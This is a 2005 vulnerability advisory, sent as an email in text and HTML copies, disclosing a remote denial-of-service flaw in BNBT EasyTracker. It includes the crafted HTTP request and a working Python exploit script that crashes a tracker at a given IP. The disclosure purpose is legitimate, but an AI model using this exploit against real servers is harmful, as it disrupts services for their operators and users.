------=_Part_1314_25115579.1125371502728 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline BNBT EasyTracker Remote Denial of Service Vulnerability by Sowhat Last Update:2005.08.30 http://secway.org/advisory/AD20050830.txt Vendor: http://bnbteasytracker.sourceforge.net/ Product Affected: 7.7r3.2004.10.27 and below Overview: BNBT was written by Trevor Hogan. BNBT is a complete port=20 of the original Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python BitTorrent tracker, plus it's=20 easy to use and customizable. BNBT is covered under the GNU Lesser General Public License (LGPL). A Denial of Service vulnerability exists within BNBT which allows for an attacker to cause the BNBT to stop responding.=20 Details: A specifically crafted HTTP request will cause the BNBT=20 Server stop responding. Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will reproduce the problem. It seems that the bug is located in client.cpp, "//grab headers" section. And it is something like " 1-2 =3D -1" and similar to memcpy(-1) ?=20 // grab headers string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" ); string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" ); strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20 iDoubleNewLine - iNewLine - strlen( "\r\n" ) ); while( 1 ) { string :: size_type iSplit =3D strTemp.find( ":" ); string :: size_type iEnd =3D strTemp.find( "\r\n" ); if( iSplit =3D=3D string :: npos ) { UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" ); break; } string strKey =3D strTemp.substr( 0, iSplit ); string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit = -=20 strlen( "\r\n" ) );//Bug here ?? rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) ); strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) ); if( iEnd =3D=3D string :: npos ) break; } However, I am not quite sure about that and it seems that it is only a D.O.S so I havnt deep into it.=20 =20 Exploit: //BNBTDOS.py # BNBT EasyTracker Remote D.O.S Exploit # Bug discoverd and coded by Sowhat # http://secway.org # Version 7.7r3.2004.10.27 and below # the BNBT project: http://bnbteasytracker.sourceforge.net/ import sys import string import socket if (len(sys.argv) !=3D 2): print "\nUsage: " + sys.argv[0] + " TargetIP\n" print "##################################################################" print "# #" print "# BNBT EasyTracker Remote D.O.S Exploit #" print "# Bug discoverd and coded by Sowhat #" print "# http://secway.org #" print "##################################################################" sys.exit(0) host =3D sys.argv[1] port =3D 6969 payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,port)) s.send(payload) WORKAROUND: No WORKAROUND this time. plz check the vendor's website for update Maybe there will be a patch later (?) Vendor Response: 2005.08.22 Vendor notified via Webform,no email found=20 2005.08.30 Vendor no response. Advisory Released "Life is like a bug, Do you know how to exploit it ?" ------=_Part_1314_25115579.1125371502728 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <p>BNBT EasyTracker Remote Denial of Service Vulnerability</p> <p>by Sowhat</p> <p>Last Update:2005.08.30</p> <p><a href=3D"http://secway.org/advisory/AD20050830.txt">http://secway.org/= advisory/AD20050830.txt</a></p> <p>Vendor:</p> <p><a href=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytrack= er.sourceforge.net/</a></p> <p>Product Affected:</p> <p>7.7r3.2004.10.27 and below</p> <p>Overview:</p> <p>BNBT was written by Trevor Hogan. BNBT is a complete port <br>of the ori= ginal Python BitTorrent tracker to C++ for speed<br>and efficiency. BNBT al= so offers many additional features<br>beyond the original Python BitTorrent= tracker, plus it's=20 <br>easy to use and customizable. BNBT is covered under the GNU<br> Le= sser General Public License (LGPL).</p> <p>A Denial of Service vulnerability exists within BNBT which<br>allows for= an attacker to cause the BNBT to stop responding. </p> <p>Details:</p> <p>A specifically crafted HTTP request will cause the BNBT <br>Server stop = responding.</p> <p>Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"<= br>will reproduce the problem. It seems that the bug is located<br>in clien= t.cpp, "//grab headers" section. And it is something<br>like &quo= t; 1-2 =3D -1" and similar to memcpy(-1) ?=20 </p> <p>// grab headers</p> <p> string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n&= quot; );<br> string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi= nd( "\r\n\r\n" );</p> <p> strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n&= quot; ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );</p> <p> while( 1 )<br> {<br> string :: size_type iSplit = =3D strTemp.find( ":" );<br> string :: size_type iEnd = =3D strTemp.find( "\r\n" );</p> <p> if( iSplit =3D=3D string :: npos )<br> {<br> = ; UTIL_LogPrint( "client warning - malformed HTTP request (= bad header)\n" );</p> <p> break;<br> }</p> <p> string strKey =3D strTemp.substr( 0, iSplit );<br> &nbs= p;string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iE= nd - iSplit - strlen( "\r\n" ) );//Bug here ??</p> <p> rqst.mapHeaders.insert( pair<string, string>( strKey, = strValue ) );</p> <p> strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" = ) );</p> <p> if( iEnd =3D=3D string :: npos )<br> break;= <br> }</p> <p>However, I am not quite sure about that and it seems that<br>it is only = a D.O.S so I havnt deep into it. <br> </p> <p>Exploit:</p> <p>//BNBTDOS.py<br># BNBT EasyTracker Remote D.O.S Exploit<br># Bug discove= rd and coded by Sowhat<br># <a href=3D"http://secway.org/">http://secway.or= g</a></p> <p># Version 7.7r3.2004.10.27 and below<br># the BNBT project: <a hre= f=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytracker.source= forge.net/</a><br> <br>import sys<br>import string<br>import socket</p= > <p>if (len(sys.argv) !=3D 2):<br> print "\nUsage: " + sys.ar= gv[0] + " TargetIP\n"<br> print "######################= ############################################"<br> print "#&n= bsp;  = ; &n= bsp;  = ; &n= bsp;  = ; #" <br> print "# &nbs= p; BNBT EasyTracker Remote D.O.S Exploit  = ; #"<br>&n= bsp;print "# &nbs= p; Bug discoverd and coded by Sowhat &nb= sp; = #"<br> print "# &n= bsp; <a href=3D"http://secway.org/"> http://secway.org</a> = &nb= sp; #"<br>= print "#########################################################= #########"<br> sys.exit(0)</p> <p>host =3D sys.argv[1]<br>port =3D 6969</p> <p><br>payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"</= p> <p>s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>s.connect((hos= t,port))<br>s.send(payload)</p> <p><br>WORKAROUND:</p> <p>No WORKAROUND this time.<br>plz check the vendor's website for update<br= >Maybe there will be a patch later (?)</p> <p>Vendor Response:</p> <p>2005.08.22 Vendor notified via Webform,no email found <br>2005.08.30 Ven= dor no response. Advisory Released</p> <p>"Life is like a bug, Do you know how to exploit it ?"</p> <p><br> </p> ------=_Part_1314_25115579.1125371502728--